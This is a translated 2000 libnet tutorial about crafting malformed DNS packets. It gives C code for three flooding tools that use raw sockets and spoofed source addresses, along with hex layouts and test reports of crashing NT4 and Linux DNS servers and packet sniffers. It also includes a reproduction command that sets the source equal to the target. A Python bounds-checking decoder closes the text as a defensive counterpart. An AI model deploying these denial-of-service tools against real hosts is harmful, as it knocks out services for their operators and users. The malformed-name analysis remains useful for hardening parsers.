Example of LIBNET (8)
Author: small four
Home: http://www.nsfocus.com
Date: 2000-08-02 11:33
This time let's take a moment to appreciate the charm of C. Look at the following function prototype:
    int libnet_build_dns(u_short id, u_short flags, u_short num_q,
                         u_short num_anws_rr, u_short num_auth_rr,
                         u_short num_addi_rr, const u_char *payload,
                         int payload_s, u_char *buf);
This function builds a DNS message. The meaning of each parameter is not explained in the libnet manual, but a very detailed explanation was given in part (7); refer to that yourself. The flags and the four counts that follow it are given exactly as you see them in a capture, without any conversion: for example, if you expect NetXray to show the flags field as 0x8000, you specify 0x8000 directly here, and the counts work the same way.
/usr/include/libnet/include/libnet/libnet-headers.h contains the macro definition:

    #define LIBNET_DNS_H 0xc    /* DNS header base: 12 bytes */
Without further ado, let's build a very simple abnormal DNS response packet. It is said that a response packet in this format causes a DoS against NT's DNS Server, but I had no success with it, and I don't know what era that claim dates from. The command line specifies the target IP; if no source IP is given, a random one is used; and finally the number of DNS response packets to send.
------------------------------------------------------------
#include <libnet.h>

/* packet, packet_size and rawsocket are globals set up by main() (not shown) */

void dnssend(u_long srcip, u_long dstip, u_long dnsnumber)
{
    u_long d;

    /* construct the IP header */
    libnet_build_ip(LIBNET_UDP_H + LIBNET_DNS_H, /* length of the IP data area */
                    IPTOS_LOWDELAY,              /* IP TOS */
                    (u_short)random(),           /* IP ID */
                    0,                           /* frag stuff */
                    255,                         /* TTL */
                    IPPROTO_UDP,                 /* upper layer protocol */
                    srcip,                       /* source IP, big-endian order */
                    dstip,                       /* target IP */
                    NULL,                        /* no options */
                    0,                           /* option length zero */
                    packet);                     /* points at the IP header */

    /* construct the UDP header */
    libnet_build_udp(53,                                  /* source port */
                     53,                                  /* target port */
                     packet + LIBNET_IP_H + LIBNET_UDP_H, /* payload */
                     LIBNET_DNS_H,                        /* payload length */
                     packet + LIBNET_IP_H);

    /* construct the abnormal DNS response header */
    libnet_build_dns(0, 0x8000, 0, 0, 0, 0, NULL, 0,
                     packet + LIBNET_IP_H + LIBNET_UDP_H);

    /* UDP checksum; the IP checksum is computed by the kernel */
    libnet_do_checksum(packet, IPPROTO_UDP, LIBNET_UDP_H + LIBNET_DNS_H);

    for (d = 0; d < dnsnumber; d++)
    {
        /* send the DNS message */
        libnet_write_ip(rawsocket, packet, packet_size);
    } /* end of for */
    return;
} /* end of dnssend */
------------------------------------------------------------

Usage: ./dki [--si srcip] [--di dstip] [--num dnsnumber]

I did not test this DoS over a wide area network, and I don't know which version of NT DNS Server is affected; on the local network it mostly froze the target host. The test results are as follows:

1) 10.60 is NT4 DNS. It was completely frozen, but pinging 10.60 from 8.90 was unaffected, and the IIS service was unaffected.
2) 0.2 is Linux DNS. It was completely frozen: from 8.90 I could not ping 0.2, and telnet 192.168.0.2 53 failed. I was amazed.

The so-called abnormal DNS response packet looks like this:

------------------------------------------------------------
00 00 11 11 11 00 10 14 FF FF FF 08 00 45 10 00 28 6e 17 00 00 FF 11 BB 98 C0 A8 08 5A C0 A8 08 5A 00 35 00 35 00 14 ED 56 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
------------------------------------------------------------

At the end you can see the problem: the question count is zero, yet the flags say this is a standard lookup response. Perhaps that should be impossible! But for some DNS implementations it does not count as an error message; I will try to explain that at the end.

As for DNS, one can imagine there are far too many DoS possibilities. For example, a DNS request packet in compressed format should normally not appear (actually I am not sure of that; if a compressed format did appear, how would it be answered?). As far as the analysis software implementations go, they parse DNS request packets that appear in compressed format without complaint. That is where the opportunity lies: if the pointers form a loop, NetXray is terminated while attempting to decode the message. Sniffer Pro 2.6 and later versions guard against this: although they also parse the compressed format, and the infinite loop, they make a boundary check, so the process is not terminated. I did not test Sniffers on other systems.

Why put this loop in a request packet rather than a response packet? Because the ID of a response packet may be checked and the packet discarded, even though the compression format in a response packet would be parsed. I can only gamble that each system's DNS implementation calls the same function for the question section and the answer section, without distinguishing which section it is currently parsing; if I am right, that DNS is dead. Note that when hitting a Sniffer, since the ID will not be checked, there is no need to construct a response packet at all.

In addition, is there any length limit in the non-compressed format? If not, it can be expanded without limit, because the end of a name is marked by a terminator, not by an overall length. I wrote two more test programs to do the boundary tests above. They were intended to deal with DNS Server; I could not manage that, but they do deal with Sniffers.

------------------------------------------------------------
...
dnsdatasize = 13 + maxiplusone * junknumber;   /* maxi is 63, maxiplusone 64, junkchar 0x61: see the layout below */
packet_size += dnsdatasize;                     /* added to the header lengths summed earlier (not shown) */
fprintf(stderr, "[dns killing...]\n");

/* allocate memory and initialize it to zero */
libnet_init_packet(packet_size, &packet);

/* the DNS question data goes here */
dnsdata = packet + LIBNET_IP_H + LIBNET_UDP_H + LIBNET_DNS_H;
dnsdata[0] = 0x03;                  /* www */
dnsdata[1] = 0x77;
dnsdata[2] = 0x77;
dnsdata[3] = 0x77;
dnsdataindex = 4;
for (j = 0; j < junknumber; j++)
{
    dnsdata[dnsdataindex++] = maxi;           /* length byte, 63 */
    for (i = 0; i < maxi; i++)
    {
        dnsdata[dnsdataindex++] = junkchar;   /* 0x61 */
    }
} /* end of for */
dnsdata[dnsdataindex++] = 0x03;     /* com */
dnsdata[dnsdataindex++] = 0x63;
dnsdata[dnsdataindex++] = 0x6f;
dnsdata[dnsdataindex++] = 0x6d;
dnsdata[dnsdataindex++] = 0x00;     /* end marker */
dnsdata[dnsdataindex++] = 0x00;     /* type = A */
dnsdata[dnsdataindex++] = 0x01;
dnsdata[dnsdataindex++] = 0x00;     /* class = IN */
dnsdata[dnsdataindex]   = 0x01;

/* create the raw socket */
rawsocket = libnet_open_raw_sock(IPPROTO_RAW);
dnssend(srcip, dstip, dnsnumber);
/* close the raw socket */
libnet_close_raw_sock(rawsocket);
/* release the memory allocated by libnet_init_packet() */
libnet_destroy_packet(&packet);
...
------------------------------------------------------------

Usage: ./dkii [--si srcip] [--di dstip] [--num dnsnumber] [--junk junknumber]

During testing it turned out that there is no need to tamper with pointers to manufacture an infinite loop: as long as the non-compressed format of the query message is expanded abnormally, that is enough to make NetXray terminate its own process when parsing (decoding) it. For example, with --junk 4, start NetXray on 8.90; NetXray was forced to terminate when decoding. Sniffer Pro is more stable than NetXray against abnormal DNS packets. LANExplorer 3.5 is terminated when trying to parse this message. The abnormal DNS request packet sent by dkii looks roughly like the following; the so-called junknumber specifies the number of 3F 61 ... 61 units.
------------------------------------------------------------
42 83          ID, randomized
01 00          parameters: forward lookup request, recursion desired
00 01          QDCOUNT, number of questions
00 00          ANCOUNT, number of answers
00 00          NSCOUNT, authority records
00 00          ARCOUNT, additional records
03 77 77 77    "www", length byte 3
3F 61 ... 61   length byte 63
3F 61 ... 61   length byte 63
...
3F 61 ... 61   length byte 63
03 63 6F 6D    "com", length byte 3
00             end
00 01          TYPE = A record
00 01          CLASS = IN, the ARPA Internet
------------------------------------------------------------

------------------------------------------------------------
...
dnsdatasize = 15;
packet_size += dnsdatasize;         /* added to the header lengths summed earlier (not shown) */
fprintf(stderr, "[dns killing...]\n");

/* allocate memory and initialize it to zero */
libnet_init_packet(packet_size, &packet);

/* the DNS question data goes here */
dnsdata = packet + LIBNET_IP_H + LIBNET_UDP_H + LIBNET_DNS_H;
dnsdata[0]  = 0x03;   /* www */
dnsdata[1]  = 0x77;
dnsdata[2]  = 0x77;
dnsdata[3]  = 0x77;
dnsdata[4]  = 0xc0;   /* pointer = 12, which actually points back at "www" */
dnsdata[5]  = 0x0c;
dnsdata[6]  = 0x03;   /* com */
dnsdata[7]  = 0x63;
dnsdata[8]  = 0x6f;
dnsdata[9]  = 0x6d;
dnsdata[10] = 0x00;   /* end marker */
dnsdata[11] = 0x00;   /* type = A */
dnsdata[12] = 0x01;
dnsdata[13] = 0x00;   /* class = IN */
dnsdata[14] = 0x01;

/* create the raw socket */
...
------------------------------------------------------------
Usage: ./dkiii [--si srcip] [--di dstip] [--num dnsnumber]

The abnormal DNS request packet sent by dkiii looks roughly like the following; it manufactures a parsing loop. NetXray is terminated, and LANExplorer 3.5 is likewise terminated when trying to parse this kind of message.

------------------------------------------------------------
42 83          ID, randomized
01 00          parameters: forward lookup request, recursion desired
00 01          QDCOUNT, number of questions
00 00          ANCOUNT, number of answers
00 00          NSCOUNT, authority records
00 00          ARCOUNT, additional records
03 77 77 77    "www", length byte 3
C0 0C          pointer = 12: a pointer appears where none should, producing a parsing loop
03 63 6F 6D    "com", length byte 3
00             end
00 01          TYPE = A record
00 01          CLASS = IN, the ARPA Internet
------------------------------------------------------------

Supplement: running ./dkii --si 192.168.10.60 --di 192.168.10.60 --num 5 --junk 4 crashed NT4 SP5 DNS Server. Running ./dkiii --si 192.168.10.60 --di 192.168.10.60 --num 5 also crashed NT4 SP5 DNS Server. Both require the source IP to be the same as the target IP, and they can be reproduced precisely; dkiii is fast, while with dkii you have to wait a little before the effect shows. net start dns recovers the service. SP6 is no longer affected. Since network equipment now filters packets whose source IP equals the destination IP, it is hard to launch this attack from outside the domain. That concludes DoS against DNS for now.
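As an added example (not code from the article or its dki/dkii/dkiii programs), here is the bounds checking a DNS decoder needs to survive all three packet shapes discussed above: labels capped at 63 bytes and names at 255 bytes (the RFC 1035 limits), compression pointers that must point strictly backwards so they can never loop, and a flag on a response whose four section counts are all zero. The three payloads it is run on are constructed inline from the byte layouts given above; the function names are my own.

```python
import struct

def decode_name(msg, offset):
    """Decode the name at offset with RFC 1035 bounds; returns (name, end offset)."""
    labels, total, pos, end, limit = [], 0, offset, None, offset
    while True:
        if pos >= len(msg):
            raise ValueError("name runs past end of message")
        length = msg[pos]
        if length & 0xC0 == 0xC0:                        # compression pointer
            if pos + 1 >= len(msg): raise ValueError("truncated pointer")
            target = ((length & 0x3F) << 8) | msg[pos + 1]
            end = pos + 2 if end is None else end        # name ends here in place
            if target >= limit:  # must land strictly before this name / last target
                raise ValueError("compression pointer loop")
            limit = pos = target
            continue
        pos += 1
        if length == 0:                                  # zero byte ends the name
            return ".".join(labels), (pos if end is None else end)
        if length > 63:                                  # also rejects 01/10 prefixes
            raise ValueError("label longer than 63 bytes")
        total += length + 1
        if total > 255:
            raise ValueError("name longer than 255 bytes")
        labels.append(msg[pos:pos + length].decode("ascii", "replace"))
        pos += length

def inspect_message(msg):
    """Return anomaly descriptions for one DNS payload; [] means it parsed cleanly."""
    if len(msg) < 12: return ["shorter than the 12-byte header"]
    _, flags, qd, an, ns, ar = struct.unpack("!6H", msg[:12])
    findings, pos = [], 12
    if flags & 0x8000 and qd == an == ns == ar == 0:     # the dki "response"
        findings.append("response with all section counts zero")
    for _ in range(qd):                                  # walk the question section
        try:
            _, pos = decode_name(msg, pos)
            pos += 4                                     # skip QTYPE and QCLASS
        except ValueError as err:
            findings.append(f"bad question name: {err}")
            break
    return findings

def header(ident, flags, qd=0):
    return struct.pack("!6H", ident, flags, qd, 0, 0, 0)
# Constructed DNS payloads in the three shapes the text describes (no IP/UDP part).
DKI_RESPONSE = header(0, 0x8000)                         # flags 0x8000, counts all 0
DKIII_QUERY = header(0x4283, 0x0100, 1) + b"\x03www\xc0\x0c\x03com\x00\x00\x01\x00\x01"
def dkii_query(junk):                                    # www + junk*(3F 61..61) + com
    return header(0x4283, 0x0100, 1) + b"\x03www" + (b"\x3f" + b"a" * 63) * junk + b"\x03com\x00\x00\x01\x00\x01"
```

With --junk 3 the dkii name is exactly 201 bytes and decodes normally; with --junk 4 it exceeds 255 bytes and is rejected before any sniffer-style buffer could be overrun, and the dkiii pointer is refused at the first jump because it does not point before the name it is in.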